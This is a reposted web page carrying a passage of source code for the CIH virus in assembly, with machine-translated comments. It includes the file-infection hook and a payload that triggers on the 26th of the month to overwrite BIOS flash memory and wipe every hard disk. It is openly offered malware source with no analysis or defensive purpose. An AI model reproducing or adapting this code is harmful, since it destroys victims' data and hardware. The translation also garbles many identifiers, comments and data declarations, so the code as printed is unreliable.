POP EBX POP EAX STC; Enable CF (Carry Flag); Setting Return Sign Pushf; Sign Bit Press; ******************* ****************; * Close file *; ********************************** ********** Closefile: XOR EAX, EAX MOV AH, 0D7H; Close file function number Call Edi; vxdcall ifsmgr_ring0_fileio; *

***********************************; * NEED to restore file model *; * time!? * ********************************************* POPF POP ESI JNC iskillComputer; CF = 0, KillComputer: - (***************************; * RESTORE FILE MODIFICATION TIME *; ** ******************************************* MOV EBX, EDI MOV AX, 4303H MOV ECX, (FileModificationTime- @ 7) [ESI] MOV EDI, (FileModificationTime 2- @ 7) [ESI] Call Ebx; vxdcall ifsmgr_ring0_fileio; Modify File Modification Time; ****************** ****************; * disable onbusy *; ******************************************* ********** Disableonbusy: Dec Byte Ptr (Onbusy- @ 7) [ESI]; Disable Onbus; ********************** **************; * Call previous filesystemapihook *; *************************************** ********* Prevhook: popad; restore all registers MOV Eax, DR0; saved original file system hook program first JMP [EAX]; jump to prevhook; jump to the previous hook; ** *************************; * Call the function That the ifs *; * manager Would Normal Call To *; * Implement this particular I / o *; * Request . *; ********************************************** PIFSFUNC:; FILESYSTEMAPIHOKFUNCTION Parameters See 2MOV EBX, ESP; EBX points to the ESP to get the parameter address PUSH DWORD PTR [EBX 20H 04H 14H]; Push Pioreq; PUSH PIOREQ PIR Stack (EBX 20H 04H is the first site) CALL [EBX 20H 04H]; Call Pifsfunc; call PIFSFUNC FSDFNADDR (FSD function address) POP ECX; MOV [EBX 1CH], EAX; Modify Eax Value In Stack; change EAX value (in the stack, 20h is Pushhad stack Size, 1Ch is the first stack EAX); **************************; * After call pifsfunc, *; * get Some data from the *; * returned pioreq. *; *********************************** CMP DWORD PTR [EBX 20H 04H 04H ], 00000024H; For details, please refer to the bid 2 jne quitmyvirusfilesystemhook; ****************; * get the file *; * mode *; * Date and

Time *; * in dos format. *; **************** MOV Eax, [ECX 28H] MOV (FileModificationTime- @ 6) [ESI], EAX; Save Getting Document time and date; *****************; * quit my virus' *; * ifsmgr_filesystemhook *; ***** ********************* QuitmyvirusFilesystemHOK: POPAD; Restore all register ret; exits from the file hook program set by virus; ********* ***************************; * KILL Computer!? ... * ^ _ ^ * *; killcomputer module (!! Danger, the principle analysis and detailed note is not announced !!); ******************************************** ** iskillComputer:; Get Now Day from BIOS CMOS MOV Al, 07h OUT 70H, Al IN AL, 71H XOR Al, 26h; ?? / 26 / ????; Get Current Date in CMOS IF DEBUG JMP Disableonbusy Else JNZ Disableonbusy Endif; if it is the 26th of the month, KillComputer (too dangerous). * ^ _ ^ * .; *********************** **************; * KILL KILL KILL KILL KILL KILL *; * KILL KILL KILL KILL KILL KILL *; * KILL KILL KILL KILL KILL KILL *; * KILL KILL KILL KILL Kill Kill Kill *; * Kill Kill Kill Kill Kill Kill Kill *; * Kill Kill Kill Kill Kill Kill Kill *; * Kill Kill Kill Kill Kill Kill Kill *; * Kill Kill Kill Kill Kill Kill Kill *; * Kill Kill Kill Kill Kill Kill Kill *; * Kill Kill Kill Kill Kill Kill Kill *; * Kill Kill Kill Kill Kill Kill Kill *; * Kill Kill Kill Kill Kill Kill Kill *; * Kill Kill Kill Kill Kill Kill Kill *; * Kill Kill Kill Kill Kill Kill Kill *; * Kill Kill Kill Kill Kill Kill Kill *; * Kill Kill Kill Kill Kill Kill Kill *; * Kill Kill Kill Kill Kill Kill Kill *; * Kill Kill Kill kill kill kill kill *; *********************************************; *******; ********; **** **************; * Kill Bios EEPROM *; ******************** ******* MOV BP, 0CF8H Lea ESI, IOFOREEPROM- @ 7 [ESI]; ************; * Show Bios Page In *; * 000E0000 - 000Effff *; * (64 kB) *; ********************** MOV EDI, 800

0384CH MOV DX, 0CFEH CLI Call ESI; ***********************; * Show Bios Page In *; * 000f0000 - 000ffff *; * (64 kB ) *; ******************************** MOV DI, 0058H DEC EDX; And A0FH MOV Word PTR (Booleancalculatecode- @ 10) [ESI], 0F24H CALL ESI; **************; * Show the bios extra *; * rom data in memory *; * 000E0000 - 000E01FF *; * (512 BYTES ) *; *, And the section *; * be writted ... *; ********************* LEA EBX , EnableeePromTowrite- @ 10 [ESI] MOV EAX, 0E5555H MOV ECX, 0E2AAAH Call EBX MOV BYTE PTR [EAX], 60H Push Ecx loop $; ******************* * M e * *; * 000E0000 - 000E007F *; * (80h Bytes) *; ***************** ***** xor Ah, AH MOV [EAX], Al Xchg ECX, EAX LOOP $; ***********************; * Show and enable The *; * bios main rom data *; * 000E0000 - 000ffff *; * (128 kb) *; * can be writted ... *; **************** ***** MOV EAX, 0F5555H POP ECX MOV CH, 0AH Call EBX MOV BYTE PTR [EAX], 20H loop $; **********************; * Kill the bios main *; * Rom data in memory *; * 000FE000 - 000FE07F *; * (80h bytes) *; ********************** MOV AH, 0E0H MOV [EAX], Al; ***** ******************; * HIDE BIOS PAGE IN *; * 000f0000 - 000ffff *; * (64 kB) *; *********** ***********; or Al 0H MOV Word PTR (Booleancalculatecode- @ 10) [ESI], 100CH CALL ESI; **************** *********; * kill all herddisk *; ****************************************** *****************; * IOR STRUCTURE OF IOS_SENDCOMMAND NEEDS *; ********************************* ***************************; * ?? ?? ?? ?? 0100 ?? ?? 01 05 00 40 ?? ?? ?? *; * 00 00 00 00 00 00 00 00 c0 *; * ?? ?? ?? ??????????

??????????? *; *???????????????????? ; * ?? ?? ??????????????????? 80??? *; ************* ********************************************* KILLHARDDISK: XOR EBX, EBX MOV BH, FIRSTKILLHARDDiskNumber Push EBX SUB ESP , 2ch push 0c0001000h mov bh, 08h push ebx push ecx push ecx push ecx push 40000501h inc ecx push ecx push ecx mov esi, esp sub esp, 0ach LoopOfKillHardDisk: int 20h dd 00100004h; VXDCall IOS_SendCommand cmp word ptr [esi 06h], 0017h je KillNextDataSection ChangeNextHardDisk: inc byte ptr [esi 4dh] jmp LoopOfKillHardDisk KillNextDataSection: add dword ptr [esi 10h], ebx mov byte ptr [esi 4dh], FirstKillHardDiskNumber jmp LoopOfKillHardDisk; ********** ****************; * enable EEPROM to write *; ******************************** ** EnableeePromTowrite: MOV [EAX], Cl Mov [ECX], Al Mov Byte PTR [EAX], 80H MOV [EAX], CL MOV [ECX], Al Ret; *********** **************; * IO for EEPROM *; ******************************************** 10 @ 10 = IO Forep xchg EAX, EDI XCHG EDX, EBP OUT DX, EAX XCHG EAX, EDI XCHG EDX, EBP IN AL, DX BOOLANCALCALCODE = $ OR Al, 44H XCHG EAX, EDI XCHG EDX, EBP OUT DX, EAX XCHG EAX, EDI XCHG EDX EBP OUT DX, Al Ret; **************************************************** **************; * static data *; *************************************** **************************** LastVxDCallAddress = IFSMgr_Ring0_FileIO; VxDCallAddressTable db instruction address VxD call last 00h db IFSMgr_RemoveFileSystemApiHook-_PageAllocate db UniToBCSPath -IFSMgr_RemoveFileSystemApiHook db IFSMgr_Ring0_FileIO-UniToBCSPath; difference VxDCallIDTable dd 00010053h address of each VxD call instruction, 00400068h, 00400041h, 00400032h; VxD call number VxDCallTableSize = ($ -VxDCallIDTable) / 04h; procedures used VxD call number; *** *****

************************************************* * Virus version Copyright *; ************************************************************* ************* VirusversionCopyRight DB 'CIH V'; CIH virus logo DB Majorvirusversion '0'; main version number DB '.' DB Minorvirusversion '0'; Depth version number DB 'Tatung' ; Author name; **************************************************** **********; * virus size *; ***************************************** ************************ VirusSize = $; SizeOfVirusCodeSectionTableEndMark (04h); NumberOfSections (??) * SizeOfVirusCodeSectionTable (08h); SizeOfTheFirstVirusCodeSectionTable (04h ); Virus code full length; *************************************************** ******; * Dynamic Data *; ****************************** *************************** VirusGameDataStartAddress = VirusSize @ 6 = VirusGameDataStartAddress OnBusy db 0; busy FileModificationTime dd;? file modification time FileNameBuffer db FileNameBufferSize DUP (?); 7FH long file name data area @ 7 = filenamebuffer databaseffer = $ @ 8 = DataBuffer Numberofsections dw?; number of blocks TIMEDATESTAMP DD?; File Time SY MBOLSPOINTER DD?; NUMBEROFSYMBOLS DD?; Symbol table SIZEOFOPTIONALHEADER DW?; Optional Department header _Characteristics DW?; information sign MAGIC DW?; sign word (always 010bh) Linkerversion DW?; connector version number SizeOfcode DD • Code segment size SIZEOFINIALIZEDDATA DD?; The data block size SIZEOFUNITALIZEDDATA DD is initialized; the data block size address DD DD DD DD DD DDTDTRYPOINT DD?; The program start RVA BaseOfData DD?; Data Segment Start RVA ImageBase DD?; load base RVA @ 9 = $ sectionalignment dd?; block aligned FileAlignment DD?; file block align OperatingSystemVersion DD?; user-defined version number subsystemversion dd?; Subsystem version number RESERVED DD?; Retain SizeOfImage DD?; SIZEOFHEADERS DD?; Ministry of Size and Block SizeOfimageHeaderto

转载请注明原文地址:https://www.9cbs.com/read-90938.html

New Post(0)